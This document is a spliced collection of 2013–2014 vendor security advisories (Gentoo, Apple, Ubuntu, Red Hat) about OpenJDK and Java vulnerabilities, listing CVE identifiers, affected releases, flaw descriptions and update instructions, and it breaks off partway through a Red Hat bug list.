http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551 [ 50 ] CVE-2011-3552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552 [ 51 ] CVE-2011-3553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553 [ 52 ] CVE-2011-3554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554 [ 53 ] CVE-2011-3556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556 [ 54 ] CVE-2011-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557 [ 55 ] CVE-2011-3558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558 [ 56 ] CVE-2011-3560 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560 [ 57 ] CVE-2011-3563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563 [ 58 ] CVE-2011-3571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3571 [ 59 ] CVE-2011-5035 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035 [ 60 ] CVE-2012-0497 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497 [ 61 ] CVE-2012-0501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501 [ 62 ] CVE-2012-0502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502 [ 63 ] CVE-2012-0503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503 [ 64 ] CVE-2012-0505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505 [ 65 ] CVE-2012-0506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506 [ 66 ] CVE-2012-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547 [ 67 ] CVE-2012-1711 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711 [ 68 ] CVE-2012-1713 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713 [ 69 ] CVE-2012-1716 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716 [ 70 ] CVE-2012-1717 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717 [ 71 ] CVE-2012-1718 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718 [ 72 ] CVE-2012-1719 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719 [ 73 ] CVE-2012-1723 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723 [ 74 ] CVE-2012-1724 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724 [ 75 ] CVE-2012-1725 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725 [ 76 ] CVE-2012-1726 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726 [ 77 ] CVE-2012-3216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216 [ 78 ] CVE-2012-3422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3422 [ 79 ] CVE-2012-3423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3423 [ 80 ] CVE-2012-4416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416 [ 81 ] CVE-2012-4540 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4540 [ 82 ] CVE-2012-5068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068 [ 83 ] CVE-2012-5069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069 [ 84 ] CVE-2012-5070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070 [ 85 ] CVE-2012-5071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071 [ 86 ] CVE-2012-5072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072 [ 87 ] CVE-2012-5073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073 [ 88 ] CVE-2012-5074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074 [ 89 ] CVE-2012-5075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075 [ 90 ] CVE-2012-5076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076 [ 91 ] CVE-2012-5077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077 [ 92 ] CVE-2012-5081 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081 [ 93 ] CVE-2012-5084 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084 [ 94 ] CVE-2012-5085 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085 [ 95 ] CVE-2012-5086 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086 [ 96 ] CVE-2012-5087 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087 [ 97 ] CVE-2012-5089 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089 [ 98 ] CVE-2012-5979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5979 [ 99 ] CVE-2013-0169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169 [ 100 ] CVE-2013-0401 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401 [ 101 ] CVE-2013-0424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0424 [ 102 ] CVE-2013-0425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0425 [ 103 ] CVE-2013-0426 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0426 [ 104 ] CVE-2013-0427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0427 [ 105 ] CVE-2013-0428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0428 [ 106 ] CVE-2013-0429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0429 [ 107 ] CVE-2013-0431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0431 [ 108 ] CVE-2013-0432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0432 [ 109 ] CVE-2013-0433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0433 [ 110 ] CVE-2013-0434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0434 [ 111 ] CVE-2013-0435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0435 [ 112 ] CVE-2013-0440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0440 [ 113 ] CVE-2013-0441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0441 [ 114 ] CVE-2013-0442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0442 [ 115 ] CVE-2013-0443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0443 [ 116 ] CVE-2013-0444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0444 [ 117 ] CVE-2013-0450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0450 [ 118 ] CVE-2013-0809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809 [ 119 ] CVE-2013-1475 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1475 [ 120 ] CVE-2013-1476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1476 [ 121 ] CVE-2013-1478 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1478 [ 122 ] CVE-2013-1480 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1480 [ 123 ] CVE-2013-1484 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484 [ 124 ] CVE-2013-1485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485 [ 125 ] CVE-2013-1486 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486 [ 126 ] CVE-2013-1488 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488 [ 127 ] CVE-2013-1493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493 [ 128 ] CVE-2013-1500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500 [ 129 ] CVE-2013-1518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518 [ 130 ] CVE-2013-1537 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537 [ 131 ] CVE-2013-1557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557 [ 132 ] CVE-2013-1569 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569 [ 133 ] CVE-2013-1571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571 [ 134 ] CVE-2013-2383 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383 [ 135 ] CVE-2013-2384 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384 [ 136 ] CVE-2013-2407 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407 [ 137 ] CVE-2013-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412 [ 138 ] CVE-2013-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415 [ 139 ] CVE-2013-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417 [ 140 ] CVE-2013-2419 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419 [ 141 ] CVE-2013-2420 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420 [ 142 ] CVE-2013-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421 [ 143 ] CVE-2013-2422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422 [ 144 ] CVE-2013-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423 [ 145 ] CVE-2013-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424 [ 146 ] CVE-2013-2426 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426 [ 147 ] CVE-2013-2429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429 [ 148 ] CVE-2013-2430 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430 [ 149 ] CVE-2013-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431 [ 150 ] CVE-2013-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436 [ 151 ] CVE-2013-2443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443 [ 152 ] CVE-2013-2444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444 [ 153 ] CVE-2013-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445 [ 154 ] CVE-2013-2446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446 [ 155 ] CVE-2013-2447 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447 [ 156 ] CVE-2013-2448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448 [ 157 ] CVE-2013-2449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449 [ 158 ] CVE-2013-2450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450 [ 159 ] CVE-2013-2451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451 [ 160 ] CVE-2013-2452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452 [ 161 ] CVE-2013-2453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453 [ 162 ] CVE-2013-2454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454 [ 163 ] CVE-2013-2455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455 [ 164 ] CVE-2013-2456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456 [ 165 ] CVE-2013-2457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457 [ 166 ] CVE-2013-2458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458 [ 167 ] CVE-2013-2459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459 [ 168 ] CVE-2013-2460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460 [ 169 ] CVE-2013-2461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461 [ 170 ] CVE-2013-2463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463 [ 171 ] CVE-2013-2465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465 [ 172 ] CVE-2013-2469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469 [ 173 ] CVE-2013-2470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470 [ 174 ] CVE-2013-2471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471 [ 175 ] CVE-2013-2472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472 [ 176 ] CVE-2013-2473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473 [ 177 ] CVE-2013-3829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829 [ 178 ] CVE-2013-4002 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4002 [ 179 ] CVE-2013-5772 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772 [ 180 ] CVE-2013-5774 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774 [ 181 ] CVE-2013-5778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778 [ 182 ] CVE-2013-5780 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780 [ 183 ] CVE-2013-5782 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782 [ 184 ] CVE-2013-5783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783 [ 185 ] CVE-2013-5784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784 [ 186 ] CVE-2013-5790 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790 [ 187 ] CVE-2013-5797 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797 [ 188 ] CVE-2013-5800 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800 [ 189 ] CVE-2013-5802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802 [ 190 ] CVE-2013-5803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803 [ 191 ] CVE-2013-5804 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804 [ 192 ] CVE-2013-5805 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805 [ 193 ] CVE-2013-5806 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806 [ 194 ] CVE-2013-5809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809 [ 195 ] CVE-2013-5814 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814 [ 196 ] CVE-2013-5817 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817 [ 197 ] CVE-2013-5820 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820 [ 198 ] CVE-2013-5823 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823 [ 199 ] CVE-2013-5825 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825 [ 200 ] CVE-2013-5829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829 [ 201 ] CVE-2013-5830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830 [ 202 ] CVE-2013-5840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840 [ 203 ] CVE-2013-5842 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842 [ 204 ] CVE-2013-5849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849 [ 205 ] CVE-2013-5850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850 [ 206 ] CVE-2013-5851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851 [ 207 ] CVE-2013-6629 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6629 [ 208 ] CVE-2013-6954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6954 [ 209 ] CVE-2014-0429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429 [ 210 ] CVE-2014-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446 [ 211 ] CVE-2014-0451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451 [ 212 ] CVE-2014-0452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452 [ 213 ] CVE-2014-0453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453 [ 214 ] CVE-2014-0456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456 [ 215 ] CVE-2014-0457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457 [ 216 ] CVE-2014-0458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458 [ 217 ] CVE-2014-0459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459 [ 218 ] CVE-2014-0460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460 [ 219 ] CVE-2014-0461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461 [ 220 ] CVE-2014-1876 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1876 [ 221 ] CVE-2014-2397 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397 [ 222 ] CVE-2014-2398 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398 [ 223 ] CVE-2014-2403 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403 [ 224 ] CVE-2014-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412 [ 225 ] CVE-2014-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414 [ 226 ] CVE-2014-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421 [ 227 ] CVE-2014-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423 [ 228 ] CVE-2014-2427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201406-32.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . (CVE-2013-2412)
It was discovered that GnomeFileTypeDetector did not check for read permissions when accessing files.
This erratum also upgrades the OpenJDK package to IcedTea7 2.3.10. Refer to the NEWS file, linked to in the References, for further information. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
APPLE-SA-2013-06-18-1 Java for OS X 2013-004 and Mac OS X v10.6 Update 16
Java for OS X 2013-004 and Mac OS X v10.6 Update 16 is now available and addresses the following:
Java Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 or later, OS X Lion Server v10.7 or later, OS X Mountain Lion 10.8 or later Impact: Multiple vulnerabilities in Java 1.6.0_45 Description: 8011782 Multiple vulnerabilities existed in Java 1.6.0_45, the most serious of which may allow an untrusted Java applet to execute arbitrary code outside the Java sandbox. These issues were addressed by updating to Java version 1.6.0_51. Further information is available via the Java website at ht tp://www.oracle.com/technetwork/java/javase/releasenotes-136954.html CVE-ID CVE-2013-1500 CVE-2013-1571 CVE-2013-2407 CVE-2013-2412 CVE-2013-2437 CVE-2013-2442 CVE-2013-2443 CVE-2013-2444 CVE-2013-2445 CVE-2013-2446 CVE-2013-2447 CVE-2013-2448 CVE-2013-2450 CVE-2013-2451 CVE-2013-2452 CVE-2013-2453 CVE-2013-2454 CVE-2013-2455 CVE-2013-2456 CVE-2013-2457 CVE-2013-2459 CVE-2013-2461 CVE-2013-2463 CVE-2013-2464 CVE-2013-2465 CVE-2013-2466 CVE-2013-2468 CVE-2013-2469 CVE-2013-2470 CVE-2013-2471 CVE-2013-2472 CVE-2013-2473 CVE-2013-3743 CVE_2013-2445
Java for OS X 2013-004 and Mac OS X v10.6 Update 16 may be obtained from the Software Update pane in System Preferences, Mac App Store, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
For Mac OS X v10.6 systems The download file is named: JavaForMacOSX10.6.Update16.dmg Its SHA-1 digest is: a6b5a9caa3c0d9acf743da8e4c0e5cfe4e471b01
For OS X Lion and Mountain Lion systems The download file is named: JavaForOSX2013-004.dmg Its SHA-1 digest is: 153c3f74d5285d10008fce2004d904da8d2ffdff
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJRwL5AAAoJEPefwLHPlZEwju0QALM1IST/ATt2xR1L0AQcaZRX eiM07MlvAlE9Jv45xqKLUezRU8XQT6+glN51/hBhpyCa8MJIzPiSnnOIAW+vbA5o RjXQTGPGT1IPSfEk7OWS++566riMLmTOvg45Qn0E/ibOqJHpfrR4wzQX5jpv7lzH EbdKxn+KWfHCF2y/2LCFifDHUBPCjUlbWTRznDCYVHsFbtDiP/vAZiSXsNJtLTXK UOD/eGbel2PEqWOOsUNIrzwvztRB+LsYT4xKQQnsEKJqoyMch/UgB1Uo2jgEPn0U YP3WZbjbDV+UcM+yMoCV/qDFhbJ+qBxTbuwYOHuSDpgqJ7vF8s0cdUUb6U7QLW4/ 3ykC7vOUS/JqYkiqwUxuKVpzSUYXrlez36sQuwCR9AOGCJ/0/MwM8QPavFAdGisP 36ZavJ4k2Dp2CfVmWjexpWY7XN9M36Lh57XChxQk9TcbjUJRrqNadlPyzaja3G9a 95Dq1N1dYfLuFm4MtyeDA0xQl8m8ljnSxH3TQoDcTwvvWGIGdG7EEVpdQqM/MTWY CY2EqMkY3Gouet+QvECYwxOz+g0hcaJd973kSM+5AJ7tVfod93NDW3P13k2cfdTC uo9IgGkhuNY40NuLpJLtTwlHcTCwBtKPt0BLwXugZdoDrgz1j8Q+fLuASSTkUQxl 3t9MUCG40o5ZQFyWqV1+ =zFXN -----END PGP SIGNATURE----- . Further information about these flaws can be found on the Oracle Java SE Critical Patch Update Advisory page, listed in the References section. ============================================================================ Ubuntu Security Notice USN-1907-2 July 16, 2013
icedtea-web update
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 13.04
- Ubuntu 12.10
- Ubuntu 12.04 LTS
Summary:
IcedTea Web updated to work with new OpenJDK 7.
Software Description: - icedtea-web: A web browser plugin to execute Java applets
Details:
USN-1907-1 fixed vulnerabilities in OpenJDK 7. Due to upstream changes, IcedTea Web needed an update to work with the new OpenJDK 7.
Original advisory details:
Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure and data integrity. (CVE-2013-1500, CVE-2013-2454, CVE-2013-2458)
A vulnerability was discovered in the OpenJDK Javadoc related to data integrity. (CVE-2013-1571)
A vulnerability was discovered in the OpenJDK JRE related to information disclosure and availability. (CVE-2013-2412, CVE-2013-2443, CVE-2013-2446, CVE-2013-2447, CVE-2013-2449, CVE-2013-2452, CVE-2013-2456)
Several vulnerabilities were discovered in the OpenJDK JRE related to availability. (CVE-2013-2448, CVE-2013-2451, CVE-2013-2459, CVE-2013-2460, CVE-2013-2461, CVE-2013-2463, CVE-2013-2465, CVE-2013-2469, CVE-2013-2470, CVE-2013-2471, CVE-2013-2472, CVE-2013-2473)
Several vulnerabilities were discovered in the OpenJDK JRE related to data integrity. (CVE-2013-2453, CVE-2013-2455, CVE-2013-2457)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 13.04: icedtea-netx 1.3.2-1ubuntu1.1
Ubuntu 12.10: icedtea-netx 1.3.2-1ubuntu0.12.10.2
Ubuntu 12.04 LTS: icedtea-netx 1.2.3-0ubuntu0.12.04.3
After a standard system update you need to restart your browser to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: java-1.6.0-openjdk security update Advisory ID: RHSA-2013:1014-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-1014.html Issue date: 2013-07-03 CVE Names: CVE-2013-1500 CVE-2013-1571 CVE-2013-2407 CVE-2013-2412 CVE-2013-2443 CVE-2013-2444 CVE-2013-2445 CVE-2013-2446 CVE-2013-2447 CVE-2013-2448 CVE-2013-2450 CVE-2013-2452 CVE-2013-2453 CVE-2013-2455 CVE-2013-2456 CVE-2013-2457 CVE-2013-2459 CVE-2013-2461 CVE-2013-2463 CVE-2013-2465 CVE-2013-2469 CVE-2013-2470 CVE-2013-2471 CVE-2013-2472 CVE-2013-2473 =====================================================================
- Summary:
Updated java-1.6.0-openjdk packages that fix various security issues are now available for Red Hat Enterprise Linux 5 and 6.
The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux (v. 5 server) - i386, x86_64 Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
These packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Software Development Kit.
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption. (CVE-2013-2470, CVE-2013-2471, CVE-2013-2472, CVE-2013-2473, CVE-2013-2463, CVE-2013-2465, CVE-2013-2469)
Integer overflow flaws were found in the way AWT processed certain input. An attacker could use these flaws to execute arbitrary code with the privileges of the user running an untrusted Java applet or application. (CVE-2013-2459)
Multiple improper permission check issues were discovered in the Sound and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2013-2448, CVE-2013-2457, CVE-2013-2453)
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information. (CVE-2013-2456, CVE-2013-2447, CVE-2013-2455, CVE-2013-2452, CVE-2013-2443, CVE-2013-2446)
It was discovered that the Hotspot component did not properly handle out-of-memory errors. An untrusted Java application or applet could possibly use these flaws to terminate the Java Virtual Machine. (CVE-2013-2445)
It was discovered that the AWT component did not properly manage certain resources and that the ObjectStreamClass of the Serialization component did not properly handle circular references. An untrusted Java application or applet could possibly use these flaws to cause a denial of service. (CVE-2013-2444, CVE-2013-2450)
It was discovered that the Libraries component contained certain errors related to XML security and the class loader. A remote attacker could possibly exploit these flaws to bypass intended security mechanisms or disclose potentially sensitive information and cause a denial of service. (CVE-2013-2407, CVE-2013-2461)
It was discovered that JConsole did not properly inform the user when establishing an SSL connection failed. An attacker could exploit this flaw to gain access to potentially sensitive information. (CVE-2013-2412)
It was found that documentation generated by Javadoc was vulnerable to a frame injection attack. If such documentation was accessible over a network, and a remote attacker could trick a user into visiting a specially-crafted URL, it would lead to arbitrary web content being displayed next to the documentation. This could be used to perform a phishing attack by providing frame content that spoofed a login form on the site hosting the vulnerable documentation. (CVE-2013-1571)
It was discovered that the 2D component created shared memory segments with insecure permissions. A local attacker could use this flaw to read or write to the shared memory segment. (CVE-2013-1500)
Red Hat would like to thank US-CERT for reporting CVE-2013-1571, and Tim Brown for reporting CVE-2013-1500. US-CERT acknowledges Oracle as the original reporter of CVE-2013-1571.
All users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258
- Bugs fixed (http://bugzilla.redhat.com/):
973474 - CVE-2013-1571 OpenJDK: Frame injection in generated HTML (Javadoc, 8012375) 975099 - CVE-2013-2470 OpenJDK: ImagingLib byte lookup processing (2D, 8011243) 975102 - CVE-2013-2471 OpenJDK: Incorrect IntegerComponentRaster size checks (2D, 8011248) 975107 - CVE-2013-2472 OpenJDK: Incorrect ShortBandedRaster size checks (2D, 8011253) 975110 - CVE-2013-2473 OpenJDK: Incorrect ByteBandedRaster size checks (2D, 8011257) 975115 - CVE-2013-2463 OpenJDK: Incorrect image attribute verification (2D, 8012438) 975118 - CVE-2013-2465 OpenJDK: Incorrect image channel verification (2D, 8012597) 975120 - CVE-2013-2469 OpenJDK: Incorrect image layout verification (2D, 8012601) 975121 - CVE-2013-2459 OpenJDK: Various AWT integer overflow checks (AWT, 8009071) 975124 - CVE-2013-2445 OpenJDK: Better handling of memory allocation errors (Hotspot, 7158805) 975125 - CVE-2013-2448 OpenJDK: Better access restrictions (Sound, 8006328) 975126 - CVE-2013-2461 OpenJDK: Missing check for valid DOMCanonicalizationMethod canonicalization algorithm (Libraries, 8014281) 975127 - CVE-2013-2407 OpenJDK: Integrate 